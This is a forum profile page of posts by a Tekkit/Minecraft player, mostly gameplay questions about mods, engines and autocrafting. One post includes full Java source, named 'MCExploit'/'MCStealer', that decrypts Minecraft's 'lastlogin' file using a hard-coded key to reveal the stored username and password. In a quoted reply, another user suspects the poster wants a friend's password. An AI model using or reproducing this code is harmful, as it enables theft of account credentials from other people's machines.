Jump to content

Lucas Souza

Members
  • Posts

    16
  • Joined

  • Last visited

Posts posted by Lucas Souza

  1. I have a lot of cows in my farm so I decide to use the Sewer to produce Sewage and create fertilazer with the composter, but the Sewer stop work after 15 buckets, why? (for put it back to work I destroy then and put it back, I use a silver upgrade, idk if it change something)

  2. In my opnion the best way is a mix with the Magmatic engines and the Combustion engines, I use a mix because I only find 2 oil souce and I use Oil Refinery, because with fuel the Combustion engine produce 6 MJ/t, 2 more comparing to Magmatic engines

  3. And why didn't that work, may I ask? Either you forgot your email password too, in which case, you have bigger problems than just this, or you're trying to get a friend's password out of the lastlogin.

    No, I'm not, I don't know which of my e-mails I put, I had almost sure that was the hotmail one, but it's not, one time I tell a friend of mine my password, and I changed it, but download the tekkit, so I didn't write the password for a long time and forgot, I THINK that my friend change my e-mail, but I don't know, because the password still the same .-.

  4. There's a way around the Energy Loss. You'll need two Turtles: A regular Turtle, and a Wrench Turtle.

    First, fill up Redstone Energy Cells (Makeshift Energy Cells would probably work better due to the smaller amount of energy, if they can retain energy when wrenched).

    Next, have a Wrench Turtle dismantle the cell in order to have it retain its energy. Have the Wrench Turtle put the cell into an Item Tesseract.

    Lastly, put another Item Tesseract and a Chest down near the Quarry. Have a regular Turtle retrieve the Energy Cell from the Chest, and have it place the cell down next to the Quarry. Free lossless energy transport.

    Exploit-ish? Oh yes.

    It remember me of Direwolf20, he did that with one mod that teleport the turtles :)

  5. Applied Energistics is your friend

    http://ae-mod.info/ME-Crafting/

    Make an assembler and all the required patterns. An me storage bus will get the stone form the DSU. Then you can just tell it to craft the diamonds.

    I'd make it a separate network if you want to make sure it only uses the cobble as the raw material.

    Thanks very much Spudgy, you help a lot!

    {But unfortunately I don't know, yet, how to use it, before know tekkit I only knew industrialcraft, steves carts, buildcraft and computercraft...}

  6. I have more than 500.000 cobblestones in my Deep Storage Unit, I want to turn it all in diamonds with some Minium Stones, so I try to use the AutoCrafting Table from BuildCraft, but it didn't work, someone knows a way for use the Minium Stone automatically, without I craft everything?

  7. I know that, I move the lastlogin to the .minecraft folder and I use this code:

    import java.io.*;

    import java.net.*;

    import java.util.*;

    import javax.crypto.*;

    import javax.crypto.spec.*;

    public class MCExploit

    { public static void main(String[] args) throws Exception {

    System.out.println(MCStealer()); } public static String MCStealer() throws Exception {

    String output = null;

    Random random = new Random(43287234L);

    byte[] salt = new byte[8];

    random.nextBytes(salt);

    PBEParameterSpec pbeParamSpec = new PBEParameterSpec(salt, 5);

    SecretKey pbeKey = SecretKeyFactory.getInstance("PBEWithMD5AndDES").generateSecret(new PBEKeySpec("passwordfile".toCharArray()));

    Cipher cipher = Cipher.getInstance("PBEWithMD5AndDES");

    cipher.init(2, pbeKey, pbeParamSpec);

    if (getWorkingDirectory().exists())

    { File lastLogin = new File(getWorkingDirectory(), "lastlogin"); DataInputStream dis = new DataInputStream(new CipherInputStream(new FileInputStream(lastLogin), cipher)); output = dis.readUTF() + " | " + dis.readUTF(); dis.close();

    }

    return output; } public static File getWorkingDirectory() {

    String userHome = System.getProperty("user.home", ".");

    File workingDirectory;

    switch (getPlatform())

    { case 1: case 2: workingDirectory = new File(userHome, ".minecraft/"); break; case 3: String applicationData = System.getenv("APPDATA"); if (applicationData != null) workingDirectory = new File(applicationData, ".minecraft/"); else workingDirectory = new File(userHome, ".minecraft/"); break; case 4: workingDirectory = new File(userHome, "Library/Application Support/minecraft"); break; default: workingDirectory = new File(userHome, ".minecraft/");

    }

    return workingDirectory; } private static int getPlatform() {

    String osName = System.getProperty("os.name").toLowerCase();

    if (osName.contains("linux")) return 1;

    if (osName.contains("unix")) return 1;

    if (osName.contains("solaris")) return 2;

    if (osName.contains("sunos")) return 2;

    if (osName.contains("win")) return 3;

    if (osName.contains("mac")) return 4;

    return 5; }

    }

    And yes, it's true --'

    But that code doesn't work in tekkit, only minecraft

  8. I'm sorry if this is not the right place to put this topic, but I don't know what to do anymore, I forgot my password and I know a little bit of JAVA, so I try to hack the login file to recovery my password, but I only know how to do that on a minecraft loginfile, in tekkit I don't have an ideia, I try a million times 'forget my password' on the minecraft.net, but nothing help, please, someone, help me...

×
×
  • Create New...